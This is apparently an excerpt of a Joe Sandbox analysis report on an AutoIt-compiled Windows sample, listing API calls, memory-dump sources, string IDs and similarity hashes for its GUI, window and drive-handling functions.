                                    • GetSysColorBrush.USER32(0000000F), ref: 00F8A8D0
                                    • GetSysColor.USER32(0000000F), ref: 00F8A8DC
                                    • SetBkColor.GDI32(?,000000FF), ref: 00F8A8F6
                                    • SelectObject.GDI32(?,?), ref: 00F8A905
                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 00F8A930
                                    • GetSysColor.USER32(00000010), ref: 00F8A938
                                    • CreateSolidBrush.GDI32(00000000), ref: 00F8A93F
                                    • FrameRect.USER32(?,?,00000000), ref: 00F8A94E
                                    • DeleteObject.GDI32(00000000), ref: 00F8A955
                                    • InflateRect.USER32(?,000000FE,000000FE), ref: 00F8A9A0
                                    • FillRect.USER32(?,?,?), ref: 00F8A9D2
                                    • GetWindowLongW.USER32(?,000000F0), ref: 00F8A9FD
                                      • Part of subcall function 00F8AB60: GetSysColor.USER32(00000012), ref: 00F8AB99
                                      • Part of subcall function 00F8AB60: SetTextColor.GDI32(?,?), ref: 00F8AB9D
                                      • Part of subcall function 00F8AB60: GetSysColorBrush.USER32(0000000F), ref: 00F8ABB3
                                      • Part of subcall function 00F8AB60: GetSysColor.USER32(0000000F), ref: 00F8ABBE
                                      • Part of subcall function 00F8AB60: GetSysColor.USER32(00000011), ref: 00F8ABDB
                                      • Part of subcall function 00F8AB60: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00F8ABE9
                                      • Part of subcall function 00F8AB60: SelectObject.GDI32(?,00000000), ref: 00F8ABFA
                                      • Part of subcall function 00F8AB60: SetBkColor.GDI32(?,00000000), ref: 00F8AC03
                                      • Part of subcall function 00F8AB60: SelectObject.GDI32(?,?), ref: 00F8AC10
                                      • Part of subcall function 00F8AB60: InflateRect.USER32(?,000000FF,000000FF), ref: 00F8AC2F
                                      • Part of subcall function 00F8AB60: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00F8AC46
                                      • Part of subcall function 00F8AB60: GetWindowLongW.USER32(00000000,000000F0), ref: 00F8AC5B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                    • String ID:
                                    • API String ID: 4124339563-0
                                    • Opcode ID: fef133a1b33233605fc780ef6f4ff29650e84b428f81ad4f0dc218e1d5e08dd5
                                    • Instruction ID: f2c46c1fe1fdad8a34a6b4915b6320f2f5668366884a1ddcb7c3026090373184
                                    • Opcode Fuzzy Hash: fef133a1b33233605fc780ef6f4ff29650e84b428f81ad4f0dc218e1d5e08dd5
                                    • Instruction Fuzzy Hash: 37A19272408305EFD710AF64DC08AAB7BA9FF88331F144A2AF562D61A0D774D845EB52
                                    APIs
                                    • DestroyWindow.USER32(00000000), ref: 00F777F1
                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00F778B0
                                    • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00F778EE
                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00F77900
                                    • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00F77946
                                    • GetClientRect.USER32(00000000,?), ref: 00F77952
                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00F77996
                                    • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00F779A5
                                    • GetStockObject.GDI32(00000011), ref: 00F779B5
                                    • SelectObject.GDI32(00000000,00000000), ref: 00F779B9
                                    • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00F779C9
                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00F779D2
                                    • DeleteDC.GDI32(00000000), ref: 00F779DB
                                    • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00F77A07
                                    • SendMessageW.USER32(00000030,00000000,00000001), ref: 00F77A1E
                                    • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00F77A59
                                    • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00F77A6D
                                    • SendMessageW.USER32(00000404,00000001,00000000), ref: 00F77A7E
                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00F77AAE
                                    • GetStockObject.GDI32(00000011), ref: 00F77AB9
                                    • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00F77AC4
                                    • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00F77ACE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                    • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                    • API String ID: 2910397461-517079104
                                    • Opcode ID: 5056e72ae32fb4fe776b4909d5b78c6e18e9e0bfd5affb6562b5341913fd3ba4
                                    • Instruction ID: b9562933ee8684955c48c23bd7bc585bc476804702e2a6f1b32fda8e80e832fe
                                    • Opcode Fuzzy Hash: 5056e72ae32fb4fe776b4909d5b78c6e18e9e0bfd5affb6562b5341913fd3ba4
                                    • Instruction Fuzzy Hash: 31A18F71A00209BFEB149BA4DD4AFEE7BA9EB48710F108114FA14E72E0D774AD04EB60
                                    APIs
                                    • SetErrorMode.KERNEL32(00000001), ref: 00F6AF89
                                    • GetDriveTypeW.KERNEL32(?,00F8FAC0,?,\\.\,00F8F910), ref: 00F6B066
                                    • SetErrorMode.KERNEL32(00000000,00F8FAC0,?,\\.\,00F8F910), ref: 00F6B1C4
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: ErrorMode$DriveType
                                    • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                    • API String ID: 2907320926-4222207086
                                    • Opcode ID: fbeac501aeefa89997c1022641543e13afdc6f9768ca18bea96050418b11710e
                                    • Instruction ID: 4679541552ff1824ac144c167b052e1bd32ee8fe6f8924aab9b2549f63e63e31
                                    • Opcode Fuzzy Hash: fbeac501aeefa89997c1022641543e13afdc6f9768ca18bea96050418b11710e
                                    • Instruction Fuzzy Hash: FE51B331A88306BBCB14EB11CD92ABD77B0AB167557304056E406E7292DB79ED81FF43
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: __wcsnicmp
                                    • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                    • API String ID: 1038674560-86951937
                                    • Opcode ID: 9bdadfc36574f117215e766ffb89b8fada2b6e4b74177179b0d4dbc08dcd4b7c
                                    • Instruction ID: 432cbf313040dfea512ae050a755fffbcb8a5ed3c52e8eec54cee717263079bf
                                    • Opcode Fuzzy Hash: 9bdadfc36574f117215e766ffb89b8fada2b6e4b74177179b0d4dbc08dcd4b7c
                                    • Instruction Fuzzy Hash: 5A8108F1B40316BACB20BB60DD82FAF7768AF14710F044025F945EA1C2EB6CEA55F691
                                    APIs
                                    • GetSysColor.USER32(00000012), ref: 00F8AB99
                                    • SetTextColor.GDI32(?,?), ref: 00F8AB9D
                                    • GetSysColorBrush.USER32(0000000F), ref: 00F8ABB3
                                    • GetSysColor.USER32(0000000F), ref: 00F8ABBE
                                    • CreateSolidBrush.GDI32(?), ref: 00F8ABC3
                                    • GetSysColor.USER32(00000011), ref: 00F8ABDB
                                    • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00F8ABE9
                                    • SelectObject.GDI32(?,00000000), ref: 00F8ABFA
                                    • SetBkColor.GDI32(?,00000000), ref: 00F8AC03
                                    • SelectObject.GDI32(?,?), ref: 00F8AC10
                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 00F8AC2F
                                    • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00F8AC46
                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00F8AC5B
                                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00F8ACA7
                                    • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00F8ACCE
                                    • InflateRect.USER32(?,000000FD,000000FD), ref: 00F8ACEC
                                    • DrawFocusRect.USER32(?,?), ref: 00F8ACF7
                                    • GetSysColor.USER32(00000011), ref: 00F8AD05
                                    • SetTextColor.GDI32(?,00000000), ref: 00F8AD0D
                                    • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00F8AD21
                                    • SelectObject.GDI32(?,00F8A869), ref: 00F8AD38
                                    • DeleteObject.GDI32(?), ref: 00F8AD43
                                    • SelectObject.GDI32(?,?), ref: 00F8AD49
                                    • DeleteObject.GDI32(?), ref: 00F8AD4E
                                    • SetTextColor.GDI32(?,?), ref: 00F8AD54
                                    • SetBkColor.GDI32(?,?), ref: 00F8AD5E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                    • String ID:
                                    • API String ID: 1996641542-0
                                    • Opcode ID: 666700577962612b91b3ceabaf4658b9d0ca86de96b3e59801f4e4133b1e40e3
                                    • Instruction ID: cf3eac1b199859f83cc246253ab403f86757ceca9ed4536f14612458115fa809
                                    • Opcode Fuzzy Hash: 666700577962612b91b3ceabaf4658b9d0ca86de96b3e59801f4e4133b1e40e3
                                    • Instruction Fuzzy Hash: 93613E72D00218EFEF119FA4DC48EEE7B79EB48320F244126F915AB2A1D7759D44EB90
                                    APIs
                                    • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00F88D34
                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00F88D45
                                    • CharNextW.USER32(0000014E), ref: 00F88D74
                                    • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00F88DB5
                                    • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00F88DCB
                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00F88DDC
                                    • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00F88DF9
                                    • SetWindowTextW.USER32(?,0000014E), ref: 00F88E45
                                    • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00F88E5B
                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00F88E8C
                                    • _memset.LIBCMT ref: 00F88EB1
                                    • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00F88EFA
                                    • _memset.LIBCMT ref: 00F88F59
                                    • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00F88F83
                                    • SendMessageW.USER32(?,00001074,?,00000001), ref: 00F88FDB
                                    • SendMessageW.USER32(?,0000133D,?,?), ref: 00F89088
                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00F890AA
                                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00F890F4
                                    • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00F89121
                                    • DrawMenuBar.USER32(?), ref: 00F89130
                                    • SetWindowTextW.USER32(?,0000014E), ref: 00F89158
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                    • String ID: 0
                                    • API String ID: 1073566785-4108050209
                                    • Opcode ID: c115339104eff49ba18e2a31d9f59b0f7ceb9a2f5c9637588c098188d728c123
                                    • Instruction ID: c2d66c014331ca044ee406a9e850b6ab18b69a717765dcccd5f63f7aeea08883
                                    • Opcode Fuzzy Hash: c115339104eff49ba18e2a31d9f59b0f7ceb9a2f5c9637588c098188d728c123
                                    • Instruction Fuzzy Hash: 07E1C371904219AFDF20EF50CC88EFE7BB8EF05360F548159F915AA191DB748A86EF60
                                    APIs
                                    • GetCursorPos.USER32(?), ref: 00F84C51
                                    • GetDesktopWindow.USER32 ref: 00F84C66
                                    • GetWindowRect.USER32(00000000), ref: 00F84C6D
                                    • GetWindowLongW.USER32(?,000000F0), ref: 00F84CCF
                                    • DestroyWindow.USER32(?), ref: 00F84CFB
                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00F84D24
                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00F84D42
                                    • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00F84D68
                                    • SendMessageW.USER32(?,00000421,?,?), ref: 00F84D7D
                                    • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00F84D90
                                    • IsWindowVisible.USER32(?), ref: 00F84DB0
                                    • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00F84DCB
                                    • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00F84DDF
                                    • GetWindowRect.USER32(?,?), ref: 00F84DF7
                                    • MonitorFromPoint.USER32(?,?,00000002), ref: 00F84E1D
                                    • GetMonitorInfoW.USER32(00000000,?), ref: 00F84E37
                                    • CopyRect.USER32(?,?), ref: 00F84E4E
                                    • SendMessageW.USER32(?,00000412,00000000), ref: 00F84EB9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                    • String ID: ($0$tooltips_class32
                                    • API String ID: 698492251-4156429822
                                    • Opcode ID: 83f3139ef5afb95ada518f64ffb2cf419a0e3a8eb394cec04c4cf88f3eede367
                                    • Instruction ID: eed4bb1b016e255d2c7403c807e65591bda460503d237fb4ee94717a0a851360
                                    • Opcode Fuzzy Hash: 83f3139ef5afb95ada518f64ffb2cf419a0e3a8eb394cec04c4cf88f3eede367
                                    • Instruction Fuzzy Hash: 6BB18071608341AFDB04DF64C849BAABBE4FF88314F008A1DF5999B2A1D775EC04EB91
                                    APIs
                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00F028BC
                                    • GetSystemMetrics.USER32(00000007), ref: 00F028C4
                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00F028EF
                                    • GetSystemMetrics.USER32(00000008), ref: 00F028F7
                                    • GetSystemMetrics.USER32(00000004), ref: 00F0291C
                                    • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00F02939
                                    • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00F02949
                                    • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00F0297C
                                    • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00F02990
                                    • GetClientRect.USER32(00000000,000000FF), ref: 00F029AE
                                    • GetStockObject.GDI32(00000011), ref: 00F029CA
                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 00F029D5
                                      • Part of subcall function 00F02344: GetCursorPos.USER32(?), ref: 00F02357
                                      • Part of subcall function 00F02344: ScreenToClient.USER32(00FC67B0,?), ref: 00F02374
                                      • Part of subcall function 00F02344: GetAsyncKeyState.USER32(00000001), ref: 00F02399
                                      • Part of subcall function 00F02344: GetAsyncKeyState.USER32(00000002), ref: 00F023A7
                                    • SetTimer.USER32(00000000,00000000,00000028,00F01256), ref: 00F029FC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                     • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                    • String ID: AutoIt v3 GUI
                                    • API String ID: 1458621304-248962490
                                    • Opcode ID: 0f7159534e4ff87cf4d2fdac7b8fe98d467ebbe372d135f818d4ac6ecfbc49c2
                                    • Instruction ID: c1641deba7690cf3d6eeef80584de957901df720f136d8304a94acd0b8fa1ae6
                                    • Opcode Fuzzy Hash: 0f7159534e4ff87cf4d2fdac7b8fe98d467ebbe372d135f818d4ac6ecfbc49c2
                                    • Instruction Fuzzy Hash: E2B14E75A0020A9FDB14DF68DD49BED7BA4FF08324F108229FA15E72D0DB74A855EB60
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                     • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: _wcscat$C1560_wcscmp_wcscpy_wcsncpy_wcsstr
                                    • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                    • API String ID: 2258151342-1459072770
                                    • Opcode ID: fe663b915e34dc11c9cfc257b1bda15f307d520bcc432f5819399f0597c5cb23
                                    • Instruction ID: e6b9bf28255f76566401f74d93ae1dc265675293c52502c6a2da83e27f201d1a
                                    • Opcode Fuzzy Hash: fe663b915e34dc11c9cfc257b1bda15f307d520bcc432f5819399f0597c5cb23
                                    • Instruction Fuzzy Hash: 0241D572A042147AEB14BA74AC42EFF776CEF41720F040169F905A6182EB69E901B7A5
                                    APIs
                                    • CharUpperBuffW.USER32(?,?), ref: 00F840F6
                                    • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00F841B6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                     • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: BuffCharMessageSendUpper
                                    • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                    • API String ID: 3974292440-719923060
                                    • Opcode ID: b993b985a701d7a31ab39d5b20668c7fb07c4a7fa6061cc129c3fa5d2d719033
                                    • Instruction ID: 8cea6e427d21b5ea2c59d947f8c58efb4559791a0f08c25218050e3e440337f0
                                    • Opcode Fuzzy Hash: b993b985a701d7a31ab39d5b20668c7fb07c4a7fa6061cc129c3fa5d2d719033
                                    • Instruction Fuzzy Hash: 74A170316182029FCB14FF10CD51AAAB3A5BF84314F144968B8969B6D3EB78FD05FB51
                                    APIs
                                    • LoadCursorW.USER32(00000000,00007F89), ref: 00F75309
                                    • LoadCursorW.USER32(00000000,00007F8A), ref: 00F75314
                                    • LoadCursorW.USER32(00000000,00007F00), ref: 00F7531F
                                    • LoadCursorW.USER32(00000000,00007F03), ref: 00F7532A
                                    • LoadCursorW.USER32(00000000,00007F8B), ref: 00F75335
                                    • LoadCursorW.USER32(00000000,00007F01), ref: 00F75340
                                    • LoadCursorW.USER32(00000000,00007F81), ref: 00F7534B
                                    • LoadCursorW.USER32(00000000,00007F88), ref: 00F75356
                                    • LoadCursorW.USER32(00000000,00007F80), ref: 00F75361
                                    • LoadCursorW.USER32(00000000,00007F86), ref: 00F7536C
                                    • LoadCursorW.USER32(00000000,00007F83), ref: 00F75377
                                    • LoadCursorW.USER32(00000000,00007F85), ref: 00F75382
                                    • LoadCursorW.USER32(00000000,00007F82), ref: 00F7538D
                                    • LoadCursorW.USER32(00000000,00007F84), ref: 00F75398
                                    • LoadCursorW.USER32(00000000,00007F04), ref: 00F753A3
                                    • LoadCursorW.USER32(00000000,00007F02), ref: 00F753AE
                                    • GetCursorInfo.USER32(?), ref: 00F753BE
                                    • GetLastError.KERNEL32(00000001,00000000), ref: 00F753E9
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                     • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
